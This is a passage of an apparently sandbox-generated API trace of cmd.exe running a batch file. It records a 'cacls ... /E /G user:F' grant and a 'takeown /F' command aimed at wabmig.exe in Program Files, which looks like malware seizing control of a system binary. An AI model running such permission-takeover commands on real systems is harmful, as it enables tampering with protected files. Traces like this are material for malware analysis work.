lpAttributeList=0x85ee90, lpPreviousValue=0x0) returned 1 [0292.971] GetStartupInfoW (in: lpStartupInfo=0x85eec8 | out: lpStartupInfo=0x85eec8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0292.972] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0292.972] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0292.973] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x85ee18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x85ee64 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0x85ee64*(hProcess=0xb8, hThread=0xb0, dwProcessId=0x94c, dwThreadId=0x990)) returned 1 [0292.981] CloseHandle (hObject=0xb0) returned 1 [0292.981] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0292.981] GetEnvironmentStringsW () returned 0xb09fe8* [0292.981] FreeEnvironmentStringsA (penv="=") returned 1 [0292.981] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0296.673] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x85edfc | out: lpExitCode=0x85edfc*=0x0) returned 1 [0296.673] CloseHandle (hObject=0xb8) returned 1 [0296.673] _vsnwprintf (in: _Buffer=0x85eee4, _BufferCount=0x13, _Format="%08X", _ArgList=0x85ee04 | out: _Buffer="00000000") returned 8 [0296.673] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0296.674] GetEnvironmentStringsW () returned 0xb0e510* [0296.674] FreeEnvironmentStringsA (penv="=") returned 1 [0296.674] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0296.674] GetEnvironmentStringsW () returned 0xb0e510* [0296.674] FreeEnvironmentStringsA (penv="=") returned 1 [0296.674] DeleteProcThreadAttributeList (in: lpAttributeList=0x85ee90 | out: lpAttributeList=0x85ee90) [0296.674] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.674] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.686] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.686] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.687] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.687] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.687] SetConsoleInputExeNameW () returned 0x1 [0296.687] GetConsoleOutputCP () returned 0x1b5 [0296.687] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.687] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.687] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x85f624, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0296.687] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0296.687] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.687] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0296.688] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.688] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0296.688] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x85f5f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x85f5f4*=0xc2, lpOverlapped=0x0) returned 1 [0296.688] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0296.688] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0296.688] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.688] GetFileType (hFile=0xb8) returned 0x1 [0296.688] _get_osfhandle (_FileHandle=3) returned 0xb8 [0296.688] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0296.688] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0296.688] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0296.688] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0296.688] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0296.688] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0296.688] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0296.688] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0296.689] _tell (_FileHandle=3) returned 47 [0296.690] _close (_FileHandle=3) returned 0 [0296.690] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f3b8 | out: _Buffer="\r\n") returned 2 [0296.690] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.690] GetFileType (hFile=0x3c) returned 0x2 [0296.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.690] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f390 | out: lpMode=0x85f390) returned 1 [0296.690] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.690] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f3a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f3a8*=0x2) returned 1 [0296.690] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0296.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.690] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x85f3b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0296.690] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x85f3b4 | out: _Buffer=">") returned 1 [0296.690] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.690] GetFileType (hFile=0x3c) returned 0x2 [0296.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.690] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f394 | out: lpMode=0x85f394) returned 1 [0296.691] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.691] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x85f3ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x85f3ac*=0x1e) returned 1 [0296.691] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.691] GetFileType (hFile=0x3c) returned 0x2 [0296.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.691] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f634 | out: lpMode=0x85f634) returned 1 [0296.691] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.691] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xb077f0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x85f64c, lpReserved=0x0 | out: lpBuffer=0xb077f0*, lpNumberOfCharsWritten=0x85f64c*=0x7) returned 1 [0296.691] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x85f654 | out: _Buffer=" /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\" ") returned 47 [0296.691] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.691] GetFileType (hFile=0x3c) returned 0x2 [0296.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.691] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f62c | out: lpMode=0x85f62c) returned 1 [0296.692] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.692] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x85f644, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f644*=0x2f) returned 1 [0296.692] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f668 | out: _Buffer="\r\n") returned 2 [0296.692] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.692] GetFileType (hFile=0x3c) returned 0x2 [0296.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.692] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f640 | out: lpMode=0x85f640) returned 1 [0296.692] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.692] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f658, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f658*=0x2) returned 1 [0296.692] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0296.692] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0296.692] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0296.692] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0296.692] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0296.693] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0296.693] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0296.693] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0296.693] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0296.693] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0296.693] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0296.693] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0296.693] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0296.693] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0296.693] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0296.693] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0296.693] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0296.693] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0296.693] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0296.693] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0296.693] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0296.693] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0296.693] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0296.693] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0296.693] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0296.693] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0296.693] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0296.693] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0296.693] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0296.693] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0296.693] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0296.693] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0296.693] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0296.693] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0296.693] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0296.693] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0296.693] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0296.693] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0296.693] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0296.693] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0296.693] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0296.693] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0296.693] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0296.693] SetErrorMode (uMode=0x0) returned 0x0 [0296.693] SetErrorMode (uMode=0x1) returned 0x0 [0296.693] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb0faf8, lpFilePart=0x85f404 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x85f404*="Desktop") returned 0x1d [0296.693] SetErrorMode (uMode=0x0) returned 0x1 [0296.694] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0296.694] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0296.694] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0296.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.694] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xffffffff [0296.694] GetLastError () returned 0x2 [0296.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.694] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xffffffff [0296.694] GetLastError () returned 0x2 [0296.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xb0cd60 [0296.694] FindClose (in: hFindFile=0xb0cd60 | out: hFindFile=0xb0cd60) returned 1 [0296.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xffffffff [0296.695] GetLastError () returned 0x2 [0296.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x85f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85f190) returned 0xb0cd60 [0296.695] FindClose (in: hFindFile=0xb0cd60 | out: hFindFile=0xb0cd60) returned 1 [0296.695] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0296.695] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0296.695] GetConsoleTitleW (in: lpConsoleTitle=0x85f1d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.695] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0296.695] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0296.695] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0296.695] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0296.695] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0296.695] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0296.695] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0296.695] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0296.695] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0296.695] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0296.695] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0296.695] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0296.695] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0296.695] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0296.695] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0296.695] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0296.695] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0296.695] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0296.695] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0296.695] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0296.695] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0296.695] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0296.695] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0296.695] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0296.696] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0296.696] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0296.696] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0296.696] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0296.696] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0296.696] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0296.696] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0296.696] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0296.696] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0296.696] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0296.696] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0296.696] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0296.696] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0296.696] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0296.696] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0296.696] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0296.696] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0296.696] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0296.696] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0296.696] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0296.696] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0296.696] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0296.696] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0296.696] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0296.696] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0296.696] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0296.696] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0296.696] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0296.696] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0296.696] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0296.696] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0296.696] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0296.696] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0296.696] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0296.696] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0296.696] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0296.696] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0296.696] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0296.696] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0296.696] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0296.696] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0296.696] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0296.696] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0296.696] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0296.696] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0296.696] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0296.696] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0296.696] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0296.696] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0296.696] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0296.696] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0296.697] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0296.697] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0296.697] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0296.697] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0296.697] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0296.697] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0296.697] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0296.697] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0296.697] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0296.697] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0296.697] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0296.697] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0296.697] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0296.697] SetErrorMode (uMode=0x0) returned 0x0 [0296.697] SetErrorMode (uMode=0x1) returned 0x0 [0296.697] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb0cf58, lpFilePart=0x85ece4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x85ece4*="Desktop") returned 0x1d [0296.697] SetErrorMode (uMode=0x0) returned 0x1 [0296.697] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0296.697] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0296.697] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0296.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.697] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xffffffff [0296.698] GetLastError () returned 0x2 [0296.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.698] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xffffffff [0296.698] GetLastError () returned 0x2 [0296.698] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0296.698] 